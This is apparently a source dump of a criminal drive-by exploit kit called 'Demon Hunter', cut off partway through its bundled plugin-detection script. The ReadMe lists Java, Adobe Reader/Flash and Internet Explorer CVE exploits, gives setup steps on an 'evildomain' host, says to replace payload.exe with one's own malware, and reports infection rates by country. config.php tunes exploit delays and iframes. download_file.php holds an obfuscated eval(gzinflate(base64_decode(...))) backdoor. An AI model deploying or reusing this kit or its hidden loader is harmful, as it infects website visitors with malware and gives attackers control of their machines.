├── ReadMe.txt
├── add_visitor.php
├── config.php
├── download_file.php
├── include
    ├── PluginDetect.js
    ├── ascii85.php
    ├── browser.php
    ├── getJavaInfo.jar
    ├── index.php
    ├── ip-to-country.bin
    ├── ip2c.php
    ├── shellcode.php
    ├── sql.php
    ├── util.php
    └── visitors.php
├── index.php
├── install
    └── index.php
├── load_module.php
├── modules
    ├── Adobe-2008-2992.php
    ├── Adobe-2010-1297.php
    ├── Adobe-2010-2884.php
    ├── Adobe-80-2010-0188.php
    ├── Adobe-90-2010-0188.php
    ├── Java-2010-0842.php
    ├── Java-2010-3552.php
    ├── JavaSignedApplet.php
    ├── helpers
    │   ├── Adobe-2010-1297.swf
    │   ├── Adobe-2010-2884.swf
    │   ├── Java-2010-0842.jar
    │   ├── Java-2010-0842Helper.php
    │   ├── JavaSignedApplet.jar
    │   └── index.php
    └── index.php
├── payload.exe
└── statistics
    ├── clear.php
    ├── css
        └── styles.css
    ├── images
        ├── clear.png
        ├── clear_hover.png
        ├── logo.png
        ├── logout.png
        ├── logout_hover.png
        ├── middlebar.png
        ├── payload.exe
        ├── spacer.png
        └── spacer2.png
    ├── index.php
    ├── login.php
    ├── logout.php
    ├── statistics.php
    └── update.php


/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | Demon Hunter Exploit Kit 1.0 (01.11.2014)
 2 | Exploits
 3 | Java
 4 | CVE-2010-0842
 5 | CVE-2010-3552
 6 | Oracle Java SE Remote Java Runtime Environment Vulnerability (CVE-2013-2460)
 7 | Signed Applet
 8 | Adobe
 9 | CVE-2008-2992
10 | CVE-2010-1297
11 | CVE-2010-2884
12 | CVE-2010-0188
13 | Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2013-2551)
14 | 
15 | 
16 | How to install?its really easy!
17 | 1) go and change www.evildomain.com/demonhunter/config.php file (base user password ,login,password etc)
18 | 2) go to www.evildomain.com/demonhunter/install and install datebase to u host
19 | 3) go to www.evildomain.com/demonhunter/statistics/statistics.php and login up
20 | 4)change payload.exe to ur exe file and call ir "payload.exe"
21 | Link for traff is  www.evildomain.com/demonhunter/index.php
22 | 
23 | % of payload mix is 7-11%,ru is 5-7%,usa is 7-10%,for start it is very nice.... 
24 | Will continue to work!


--------------------------------------------------------------------------------
/add_visitor.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 
 4 | include_once('config.php');
 5 | include_once('include/sql.php');
 6 | include_once('include/visitors.php');
 7 | $sql = new CSQL($sqlSettings);
 8 | $sql->open();
 9 | 	
10 | $cvisitors = new CVisitors($sql, $sqlSettings);
11 | $exploited = $cvisitors->checkVisitor($_SERVER['HTTP_USER_AGENT'], $cvisitors->getIpAddr(), $cvisitors->getIpAddrCountry($cvisitors->getIpAddr()));
12 | $sql->close();
13 | 
14 | if($exploited){
15 | 	exit();
16 | }
17 | ?>
18 | 


--------------------------------------------------------------------------------
/config.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 
 4 | 
 5 | //dbHost:  The hostname to where your MySQL database is located.
 6 | $sqlSettings['dbHost'] = 'localhost';
 7 | 
 8 | //dbUsername:  The username for your MySQL database.
 9 | $sqlSettings['dbUsername'] = 'admin';
10 | 
11 | //dbPassword:  The password for your MySQL database.
12 | $sqlSettings['dbPassword'] = '123455';
13 | 
14 | //dbName:  The name your MySQL database.
15 | $sqlSettings['dbName'] = '1234_2311base';
16 | 
17 | //tableVisitorsList:  The table name to track visitors.  This is created in the install process.
18 | $sqlSettings['tableVisitorsList'] = 'visitors_list';
19 | 
20 | //panel_user: the username used to secure the statistics page
21 | $panel_user = "admin";
22 | //panel_pass: the password used to secure the statistics page
23 | $panel_pass = "mypassword";
24 | 
25 | 
26 | //enabled_signed: enable the java signed applet.  (this requires user interaction)
27 | $enable_signed = true;
28 | 
29 | 
30 | //exploit_delay: this is the delay between exploits in milliseconds.  10 seconds = 10000, 5 seconds = 5000, etc.
31 | $exploit_delay = 5000;
32 | 
33 | //reuse_iframe:  by default each exploit is created in its own iframe.  set this to true to reuse the same iframe for each exploit
34 | $reuse_iframe = false;
35 | 
36 | //ajax_stats:  refresh the "Overall Statistics" using ajax.
37 | $ajax_stats = true;
38 | 
39 | //ajax_delay: this is the delay between refreshing in milliseconds.  10 seconds = 10000, 5 seconds = 5000, etc.
40 | $ajax_delay = 5000;
41 | 
42 | ?>
43 | 


--------------------------------------------------------------------------------
/download_file.php:
--------------------------------------------------------------------------------
1 | <?php
2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVTHDqRGFPyXvaxtLBObIMuHIcOQh6yVLDJDTsMwfL1Z70r2oVR6VdWH192qaSmqv5di6pKs+OUL/MdvcPHl9y/fDhJ8OyjyYvQC9+3A6IupS7tdzFwQLpA/vO8Zivhx5t8c9lPDf2j4lcMvH4jX/DNHfvf+N2P019N31JM0JNF67zgWPAQFjc97PPKvM0IUxGj8FvFW20yn3TCqGCrjmlY+QYjL+tj5wLeKYZrLHY1QmTGdlNGy/h6eAAtxOBUdCC7xT2mWKXXKeuodL4869S3Vj71fHsdLkNO3jJLWqdHwYg3UcTIepkNGkGp6vFtktzM6XTK0BXyEVsIU9NUG87IYNcqKjpqa2fxsZmI4yfsdrjvg5XBmqFI3f7Q7ij5Mu30Ce36xp8fegBJBwZBXzprocVRiFR4wn0XMUc33W7TQp/2MzFh1yNcjSE7u6DJ3STYH5HE+FaaI9MEKtSLscoDMCkI6IUw6ujABMkeocYhR2YqNZWVJcpcia7GXsAsPEM4mcq6zeBNsPN8Ki6BpdS3zB1JmD1ZC+jFiUd4cUsULSIJs+euGO7HRuutl0mrQbZdvEhh0ec0+2lvhAJiX4rGRKA0vEFwGkc6xObmFjf2xeN9QPYvvp4qYUkdGTSJ+jO+SEUaI0wR/IAOmVeCOj+GJVQuUvlHM7gndrnoDAq5VYNduwkZh3OX+pgSnKd+Iqq0BAmd1KQrxBM0bnrG2dPQV1qeo+kTkI9oarSDYzMkAuSy10ad7S5PsHLU7nm/1TVXPQd1NDA105Hy+dwexUUN3ms7l/cdZ+U+SyX0HT+pxtWF4nPX2dnKmQ3iFEviiv2jN/TSjjZ1r/PpwXh2cxvJk8rQSVlQPd43WooyeSHv9uPxm3AgVUUTjpREbCIb1pXRTwG7GKImOb7CBiHwwANzuQzXPIZf8YDv44xEZLJPMryveBJkURBIO7sUpzCTlhrXP6R2TKYjY47diNs4lyznAh1lG+3s47W7Byjyq3cM4RexALcnGQ9x9jV7RgY0mUIrDiCqTIHdAGilY+pcjyVni+enccspAAW+sOy58yBPmVERS+RBVDLsJpCK6i4h/ynU3DKLOiIL/bC3XRAlaFKPFVxH5jTmEPriWYEqMmVrmeDZSnVjJdlup5zK8YhGph5DVlgBBih1LS9eGXovaEenbGTANBUgnhsY4tqpO17N7awWpD8+9x5g9pPxsLHKnK5OQic/8VnjmVQdanQAgr02m72HY4DiJuBjJP8oCQoPFmenP2tZ824oBhFPvsGS0gvPSejsnIAg5Fw+2qzoazH088621fOh1TKQ7G77Ppsk2VOFGuUG/kzdlzzME54UFV+tfX6+GYv4Dzl4l+eXXP/8B'\x29\x29\x29\x3B","");
3 | ?>


--------------------------------------------------------------------------------
/include/PluginDetect.js:
--------------------------------------------------------------------------------
  1 | 
  2 | /* PluginDetect v0.7.4 by Eric Gerds www.pinlady.net/PluginDetect [ onWindowLoaded getVersion Java(OTF) Flash AdobeReader ] */var PluginDetect={version:"0.7.4",handler:function(c,b,a){return function(){c(b,a)
  3 | }
  4 | },isDefined:function(b){return typeof b!="undefined"
  5 | },isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))
  6 | },isFunc:function(b){return typeof b=="function"
  7 | },isString:function(b){return typeof b=="string"
  8 | },isNum:function(b){return typeof b=="number"
  9 | },isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))
 10 | },getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;
 11 | return a?a[0]:null
 12 | },compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;
 13 | if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)
 14 | }c=h.split(e.splitNumRegx);
 15 | b=f.split(e.splitNumRegx);
 16 | for(a=0;
 17 | a<Math.min(c.length,b.length);
 18 | a++){if(g(c[a],10)>g(b[a],10)){return 1
 19 | }if(g(c[a],10)<g(b[a],10)){return -1
 20 | }}}return 0
 21 | },formatNum:function(b,c){var d=this,a,e;
 22 | if(!d.isStrNum(b)){return null
 23 | }if(!d.isNum(c)){c=4
 24 | }c--;
 25 | e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);
 26 | for(a=0;
 27 | a<4;
 28 | a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2
 29 | }if(a>c||!(/\d/).test(e[a])){e[a]="0"
 30 | }}return e.slice(0,4).join(",")
 31 | },$$hasMimeType:function(a){return function(d){if(!a.isIE){var c,b,e,f=a.isString(d)?[d]:d;
 32 | for(e=0;
 33 | e<f.length;
 34 | e++){if(/[^\s]/.test(f[e])&&(c=navigator.mimeTypes[f[e]])&&(b=c.enabledPlugin)&&(b.name||b.description)){return c
 35 | }}}return null
 36 | }
 37 | },findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;
 38 | for(f=0;
 39 | f<a.length;
 40 | f++){m=a[f].description||g;
 41 | b=a[f].name||g;
 42 | if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]
 43 | }}}return null
 44 | },getMimeEnabledPlugin:function(a,e){var d=this,b,c=new RegExp(e,"i");
 45 | if((b=d.hasMimeType(a))&&(b=b.enabledPlugin)&&(c.test(b.description||"")||c.test(b.name||""))){return b
 46 | }return 0
 47 | },getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;
 48 | if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b
 49 | }if(!b){return e
 50 | }e=h.formatNum(e);
 51 | b=h.formatNum(b);
 52 | d=b.split(h.splitNumRegx);
 53 | g=e.split(h.splitNumRegx);
 54 | for(a=0;
 55 | a<d.length;
 56 | a++){if(c>-1&&a>c&&d[a]!="0"){return b
 57 | }if(g[a]!=d[a]){if(c==-1){c=a
 58 | }if(d[a]!="0"){return b
 59 | }}}return e
 60 | },AXO:window.ActiveXObject,getAXO:function(a){var d=null,c,b=this;
 61 | try{d=new b.AXO(a)
 62 | }catch(c){}return d
 63 | },convertFuncs:function(g){var a,h,f,b=/^[\$][\$]/,d={},c=this;
 64 | for(a in g){if(b.test(a)){d[a]=1
 65 | }}for(a in d){try{h=a.slice(2);
 66 | if(h.length>0&&!g[h]){g[h]=g[a](g);
 67 | delete g[a]
 68 | }}catch(f){}}},initScript:function(){var c=this,a=navigator,d="/",h=a.userAgent||"",f=a.vendor||"",b=a.platform||"",g=a.product||"";
 69 | ;
 70 | c.OS=(/win/i).test(b)?1:((/mac/i).test(b)?2:((/linux/i).test(b)?3:4));
 71 | c.convertFuncs(c);
 72 | c.isIE=new Function("return "+d+"*@cc_on!@*"+d+"false")();
 73 | c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(h)?parseFloat(RegExp.$1,10):null;
 74 | c.ActiveXEnabled=false;
 75 | if(c.isIE){var e,i=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];
 76 | for(e=0;
 77 | e<i.length;
 78 | e++){if(c.getAXO(i[e])){c.ActiveXEnabled=true;
 79 | break
 80 | }}c.head=c.isDefined(document.getElementsByTagName)?document.getElementsByTagName("head")[0]:null
 81 | }c.isGecko=(/Gecko/i).test(g)&&(/Gecko\s*\/\s*\d/i).test(h);
 82 | c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(h)?RegExp.$1:"0.9"):null;
 83 | c.isSafari=(/Safari\s*\/\s*\d/i).test(h)&&(/Apple/i).test(f);
 84 | c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(h);
 85 | c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;
 86 | c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(h);
 87 | c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(h)||1)?parseFloat(RegExp.$1,10):null;
 88 | ;
 89 | c.addWinEvent("load",c.handler(c.runWLfuncs,c));
 90 | 
 91 | },init:function(c){var b=this,a,c;
 92 | if(!b.isString(c)){
 93 | return -3
 94 | }if(c.length==1){b.getVersionDelimiter=c;
 95 | return -3
 96 | }c=c.toLowerCase().replace(/\s/g,"");
 97 | a=b[c];
 98 | if(!a||!a.getVersion){
 99 | return -3
100 | }b.plugin=a;
101 | if(!b.isDefined(a.installed)){a.installed=a.version=a.version0=a.getVersionDone=null;
102 | a.$=b;
103 | a.pluginName=c
104 | }b.garbage=false;
105 | if(b.isIE&&!b.ActiveXEnabled){if(a!==b.java){return -2
106 | }}return 1
107 | },fPush:function(b,a){var c=this;
108 | if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)
109 | }},callArray:function(b){var c=this,a;
110 | if(c.isArray(b)){for(a=0;
111 | a<b.length;
112 | a++){if(b[a]===null){return
113 | }c.call(b[a]);
114 | b[a]=null
115 | }}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;
116 | if(a>0&&b.isFunc(c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)
117 | }else{if(b.isFunc(c)){c(b)
118 | }}},getVersionDelimiter:",",$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b;
119 | if(e<0){return null
120 | };
121 | f=a.plugin;
122 | if(f.getVersionDone!=1){f.getVersion(d,c);
123 | if(f.getVersionDone===null){f.getVersionDone=1
124 | }}a.cleanup();
125 | b=(f.version||f.version0);
126 | return b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b
127 | }
128 | },cleanup:function(){
129 | var a=this;
130 | if(a.garbage&&a.isDefined(window.CollectGarbage)){window.CollectGarbage()
131 | }
132 | },addWinEvent:function(d,c){var e=this,a=window,b;
133 | if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)
134 | }else{if(a.attachEvent){a.attachEvent("on"+d,c)
135 | }else{b=a["on"+d];
136 | a["on"+d]=e.winHandler(c,b)
137 | }}}},winHandler:function(d,c){return function(){d();
138 | if(typeof c=="function"){c()
139 | }}
140 | },WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){a.winLoaded=true;
141 | ;
142 | ;
143 | a.callArray(a.WLfuncs0);
144 | a.callArray(a.WLfuncs);
145 | ;
146 | if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()
147 | }},winLoaded:false,$$onWindowLoaded:function(a){return function(b){
148 | if(a.winLoaded){
149 | a.call(b);
150 | }else{a.fPush(b,a.WLfuncs)
151 | }}
152 | },div:null,divWidth:50,pluginSize:1,emptyDiv:function(){var c=this,a,e,b,d=0;
153 | if(c.div&&c.div.childNodes){
154 | for(a=c.div.childNodes.length-1;
155 | a>=0;
156 | a--){b=c.div.childNodes[a];
157 | if(b&&b.childNodes){if(d==0){for(e=b.childNodes.length-1;
158 | e>=0;
159 | e--){b.removeChild(b.childNodes[e])
160 | }c.div.removeChild(b)
161 | }else{}}}}},DONEfuncs:[],onDoneEmptyDiv:function(){var c=this,a,b;
162 | if(!c.winLoaded){return
163 | }if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!==null){return
164 | }for(a in c){b=c[a];
165 | if(b&&b.funcs){if(b.OTF==3){return
166 | }if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return
167 | }}}for(a=0;
168 | a<c.DONEfuncs.length;
169 | a++){c.callArray(c.DONEfuncs)
170 | }c.emptyDiv()
171 | },getWidth:function(c){if(c){var a=c.scrollWidth||c.offsetWidth,b=this;
172 | if(b.isNum(a)){return a
173 | }}return -1
174 | },getTagStatus:function(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);
175 | if(!k||!h||!d||!c.getDOMobj(m)){return -2
176 | }if(j<i||l<0||j<0||i<0||i<=c.pluginSize||c.pluginSize<1){return 0
177 | }if(l>=i){return -1
178 | }try{if(l==c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1
179 | }if(m.winLoaded&&c.isNum(b)){if(!c.isNum(m.count)){m.count=b
180 | }if(b-m.count>=10){return 1
181 | }}}}catch(f){}return 0
182 | },getDOMobj:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;
183 | try{if(b&&a){c.firstChild.focus()
184 | }}catch(f){}return b?c.firstChild:null
185 | },setStyle:function(b,g){var f=b.style,a,d,c=this;
186 | if(f&&g){for(a=0;
187 | a<g.length;
188 | a=a+2){try{f[g[a]]=g[a+1]
189 | }catch(d){}}}},insertDivInBody:function(i){var g,d=this,h="pd33993399",c=null,f=document,b="<",a=(f.getElementsByTagName("body")[0]||f.body);
190 | if(!a){try{f.write(b+'div id="'+h+'">o'+b+"/div>");
191 | c=f.getElementById(h)
192 | }catch(g){}}a=(f.getElementsByTagName("body")[0]||f.body);
193 | if(a){if(a.firstChild&&d.isDefined(a.insertBefore)){a.insertBefore(i,a.firstChild)
194 | }else{a.appendChild(i)
195 | }if(c){a.removeChild(c)
196 | }}else{}},insertHTML:function(g,b,h,a,k){var l,m=document,j=this,q,o=m.createElement("span"),n,i,f="<";
197 | var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];
198 | if(!j.isDefined(a)){a=""
199 | }if(j.isString(g)&&(/[^\s]/).test(g)){q=f+g+' width="'+j.pluginSize+'" height="'+j.pluginSize+'" ';
200 | for(n=0;
201 | n<b.length;
202 | n=n+2){if(/[^\s]/.test(b[n+1])){q+=b[n]+'="'+b[n+1]+'" '
203 | }}q+=">";
204 | for(n=0;
205 | n<h.length;
206 | n=n+2){if(/[^\s]/.test(h[n+1])){q+=f+'param name="'+h[n]+'" value="'+h[n+1]+'" />'
207 | }}q+=a+f+"/"+g+">"
208 | }else{q=a
209 | }if(!j.div){j.div=m.createElement("div");
210 | i=m.getElementById("plugindetect");
211 | if(i){j.div=i
212 | }else{j.div.id="plugindetect";
213 | j.insertDivInBody(j.div)
214 | }j.setStyle(j.div,c.concat(["width",j.divWidth+"px","height",(j.pluginSize+3)+"px","fontSize",(j.pluginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));
215 | if(!i){j.setStyle(j.div,["position","absolute","right","0px","top","0px"])
216 | }}if(j.div&&j.div.parentNode){
217 | ;
218 | j.div.appendChild(o);
219 | j.setStyle(o,c.concat(["fontSize",(j.pluginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));
220 | try{if(o&&o.parentNode){o.focus()
221 | }}catch(l){}try{o.innerHTML=q
222 | }catch(l){}if(o.childNodes.length==1&&!(j.isGecko&&j.compareNums(j.verGecko,"1,5,0,0")<0)){j.setStyle(o.firstChild,c.concat(["display","inline"]))
223 | }return{span:o,winLoaded:j.winLoaded,tagName:(j.isString(g)?g:"")}
224 | }return{span:null,winLoaded:j.winLoaded,tagName:""}
225 | },java:{mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeTypeJPI:"application/x-java-applet;jpi-version=",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",DTKclassID:"clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",DTKmimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],forceVerifyTag:[],jar:[],Enabled:navigator.javaEnabled(),VENDORS:["Sun Microsystems Inc.","Apple Computer, Inc."],OTF:null,All_versions:[],mimeTypeJPIresult:"",JavaPlugin_versions:[],JavaVersions:[[1,9,2,30],[1,8,2,30],[1,7,2,30],[1,6,1,30],[1,5,1,30],[1,4,2,30],[1,3,1,30]],searchJavaPluginAXO:function(){var h=null,a=this,c=a.$,g=[],j=[1,5,0,14],i=[1,6,0,2],f=[1,3,1,0],e=[1,4,2,0],d=[1,5,0,7],b=false;
226 | if(!c.ActiveXEnabled){return null
227 | };
228 | if(c.verIE>=a.minIEver){g=a.searchJavaAXO(i,i,b);
229 | if(g.length>0&&b){g=a.searchJavaAXO(j,j,b)
230 | }}else{
231 | if(g.length==0){g=a.searchJavaAXO(f,e,false)
232 | }}if(g.length>0){h=g[0]
233 | }a.JavaPlugin_versions=[].concat(g);
234 | return h
235 | },searchJavaAXO:function(l,i,m){var n,f,h=this.$,q,k,a,e,g,j,b,r=[];
236 | if(h.compareNums(l.join(","),i.join(","))>0){i=l
237 | }i=h.formatNum(i.join(","));
238 | var o,d="1,4,2,0",c="JavaPlugin."+l[0]+""+l[1]+""+l[2]+""+(l[3]>0?("_"+(l[3]<10?"0":"")+l[3]):"");
239 | for(n=0;
240 | n<this.JavaVersions.length;
241 | n++){f=this.JavaVersions[n];
242 | q="JavaPlugin."+f[0]+""+f[1];
243 | g=f[0]+"."+f[1]+".";
244 | for(a=f[2];
245 | a>=0;
246 | a--){b="JavaWebStart.isInstalled."+g+a+".0";
247 | if(h.compareNums(f[0]+","+f[1]+","+a+",0",i)>=0&&!h.getAXO(b)){continue
248 | }o=h.compareNums(f[0]+","+f[1]+","+a+",0",d)<0?true:false;
249 | for(e=f[3];
250 | e>=0;
251 | e--){k=a+"_"+(e<10?"0"+e:e);
252 | j=q+k;
253 | if(h.getAXO(j)&&(o||h.getAXO(b))){r.push(g+k);
254 | if(!m){return r
255 | }}if(j==c){return r
256 | }}if(h.getAXO(q+a)&&(o||h.getAXO(b))){r.push(g+a);
257 | if(!m){return r
258 | }}if(q+a==c){return r
259 | }}}return r
260 | },minIEver:7,getMimeJPIversion:function(){var h,a=this,d=a.$,c=new RegExp("("+a.mimeTypeJPI+")(\\d.*)","i"),k=new RegExp("Java","i"),e,j,f="",i={},g=0,b;
261 | for(h=0;
262 | h<navigator.mimeTypes.length;
263 | h++){j=navigator.mimeTypes[h];
264 | if(c.test(j.type)&&(e=j.enabledPlugin)&&(j=RegExp.$2)&&(k.test(e.description||f)||k.test(e.name||f))){i["a"+d.formatNum(j)]=j
265 | }}b="0,0,0,0";
266 | for(h in i){g++;
267 | e=h.slice(1);
268 | if(d.compareNums(e,b)>0){b=e
269 | }}a.mimeTypeJPIresult=g>0?a.mimeTypeJPI+i["a"+b]:"";
270 | return g>0?b:null
271 | },getVersion:function(d,l){var f,c=this,e=c.$,h=c.NOTF,b=c.applet,j=c.verify,i=vendor=versionEnabled=null;
272 | ;
273 | if(c.getVersionDone===null){c.OTF=0;
274 | c.mimeObj=e.hasMimeType(c.mimeType);
275 | c.deployTK.$=e;
276 | c.deployTK.parentNode=c;
277 | b.$=e;
278 | b.parentNode=c;
279 | if(h){h.$=e;
280 | h.parentNode=c
281 | }if(j){j.parentNode=c;
282 | j.$=e;
283 | j.init()
284 | }}var k;
285 | if(e.isArray(l)){for(k=0;
286 | k<b.allowed.length;
287 | k++){if(e.isNum(l[k])){b.allowed[k]=l[k]
288 | }}}for(k=0;
289 | k<c.forceVerifyTag.length;
290 | k++){b.allowed[k]=c.forceVerifyTag[k]
291 | }if(e.isString(d)){c.jar.push(d)
292 | }if(c.getVersionDone==0){if(!c.version||b.canTryAny()){f=b.insertHTMLQueryAll(d);
293 | if(f[0]){c.installed=1;
294 | c.EndGetVersion(f[0],f[1])
295 | }}return
296 | }var g=c.deployTK.query();
297 | if(g.JRE){i=g.JRE;
298 | vendor=c.VENDORS[0]
299 | }if(!e.isIE){var o,m,a,n;
300 | n=(c.mimeObj&&c.Enabled)?true:false;
301 | if(!i&&(f=c.getMimeJPIversion())!==null){i=f
302 | }if(!i&&c.mimeObj){f="Java[^\\d]*Plug-in";
303 | a=e.findNavPlugin(f);
304 | if(a){f=new RegExp(f,"i");
305 | o=f.test(a.description||"")?e.getNum(a.description):null;
306 | m=f.test(a.name||"")?e.getNum(a.name):null;
307 | if(o&&m){i=(e.compareNums(e.formatNum(o),e.formatNum(m))>=0)?o:m
308 | }else{i=o||m
309 | }}}if(!i&&c.mimeObj&&e.isSafari&&e.OS==2){a=e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa",0);
310 | if(a){o=e.getNum(a.description);
311 | if(o){i=o
312 | }}}if(i){c.version0=i;
313 | if(c.Enabled){versionEnabled=i
314 | }}}else{if(!i&&g.status==0){i=c.searchJavaPluginAXO();
315 | if(i){vendor=c.VENDORS[0]
316 | }}if(i){c.version0=i;
317 | if(c.Enabled&&e.ActiveXEnabled){versionEnabled=i
318 | }}}if(!versionEnabled||b.canTryAny()){f=b.insertHTMLQueryAll(d);
319 | if(f[0]){versionEnabled=f[0];
320 | vendor=f[1]
321 | }}if(!versionEnabled&&(f=c.queryWithoutApplets())[0]){c.version0=versionEnabled=f[0];
322 | vendor=f[1];
323 | if(c.installed==-0.5){c.installed=0.5
324 | }}if(e.isSafari&&e.OS==2){if(!versionEnabled&&n){if(c.installed===null){c.installed=0
325 | }else{if(c.installed==-0.5){c.installed=0.5
326 | }}}}if(c.jreDisabled()){versionEnabled=null
327 | };
328 | if(c.installed===null){c.installed=versionEnabled?1:(i?-0.2:-1)
329 | }c.EndGetVersion(versionEnabled,vendor)
330 | },EndGetVersion:function(b,d){var a=this,c=a.$;
331 | if(a.version0){a.version0=c.formatNum(c.getNum(a.version0))
332 | }if(b){a.version=c.formatNum(c.getNum(b));
333 | a.vendor=(c.isString(d)?d:"")
334 | }if(a.getVersionDone!=1){a.getVersionDone=0
335 | }},jreDisabled:function(){var b=this,d=b.$,c=b.deployTK.query().JRE,a;
336 | if(c&&d.OS==1){if((d.isGecko&&d.compareNums(d.verGecko,"1,9,2,0")>=0&&d.compareNums(c,"1,6,0,12")<0)||(d.isChrome&&d.compareNums(c,"1,6,0,12")<0)){return 1
337 | }};
338 | if(d.isOpera&&d.verOpera>=9&&!b.Enabled&&!b.mimeObj&&!b.queryWithoutApplets()[0]){return 1
339 | }if((d.isGecko||d.isChrome)&&!b.mimeObj&&!b.queryWithoutApplets()[0]){return 1
340 | }return 0
341 | },deployTK:{status:null,JREall:[],JRE:null,HTML:null,query:function(){var f=this,h=f.$,c=f.parentNode,i,a,b,g=len=null;
342 | if(f.status!==null){return f
343 | }f.status=0;
344 | if((h.isGecko&&h.compareNums(h.verGecko,h.formatNum("1.6"))<=0)||h.isSafari||(h.isIE&&!h.ActiveXEnabled)){return f
345 | }if(h.isIE&&h.verIE>=6){f.HTML=h.insertHTML("object",[],[]);
346 | g=h.getDOMobj(f.HTML)
347 | }else{if(!h.isIE&&(b=h.hasMimeType(c.DTKmimeType))&&b.type){f.HTML=h.insertHTML("object",["type",b.type],[]);
348 | g=h.getDOMobj(f.HTML)
349 | }}if(g){if(h.isIE&&h.verIE>=6){try{g.classid=c.DTKclassID
350 | }catch(i){}};
351 | try{var d=g.jvms;
352 | if(d){len=d.getLength();
353 | if(h.isNum(len)){f.status=len>0?1:-1;
354 | for(a=0;
355 | a<len;
356 | a++){b=h.getNum(d.get(len-1-a).version);
357 | if(b){f.JREall[a]=b
358 | }}}}}catch(i){}}if(f.JREall.length>0){f.JRE=h.formatNum(f.JREall[0])
359 | }return f
360 | }},queryWithoutApplets00:function(c,a){var b=window.java,d;
361 | try{if(b.lang){a.value=[b.lang.System.getProperty("java.version")+" ",b.lang.System.getProperty("java.vendor")+" "]
362 | }}catch(d){}},queryWithoutApplets:function(){var b=this,c=b.$,d,a=b.queryWithoutApplets;
363 | if(!a.value){a.value=[null,null];
364 | if(!c.isIE&&window.java){if(c.OS==2&&c.isOpera&&c.verOpera<9.2&&c.verOpera>=9){}else{if(c.isGecko&&c.compareNums(c.verGecko,"1,9,0,0")<0&&c.compareNums(c.verGecko,"1,8,0,0")>=0){}else{b.queryWithoutApplets00(c,a)
365 | }}}}return a.value
366 | },applet:{results:[[null,null],[null,null],[null,null]],HTML:[0,0,0],active:[0,0,0],allowed:[2,2,2],DummyObjTagHTML:0,DummySpanTagHTML:0,getResult:function(){var c=this.results,a,b;
367 | for(a=0;
368 | a<c.length;
369 | a++){b=c[a];
370 | if(b[0]){break
371 | }}return[].concat(b)
372 | },canTry:function(d){var b=this,c=b.$,a=b.parentNode;
373 | if(b.allowed[d]==3){return true
374 | }if(!a.version0||!a.Enabled||(c.isIE&&!c.ActiveXEnabled)){if(b.allowed[d]==2){return true
375 | }if(b.allowed[d]==1&&!b.getResult()[0]){return true
376 | }}return false
377 | },canTryAny:function(){var b=this,a;
378 | for(a=0;
379 | a<b.allowed.length;
380 | a++){if(b.canTry(a)){return true
381 | }}return false
382 | },canUseAppletTag:function(){var b=this,c=b.$,a=b.parentNode;
383 | return(!c.isIE||a.Enabled)
384 | },canUseObjectTag:function(){var a=this,b=a.$;
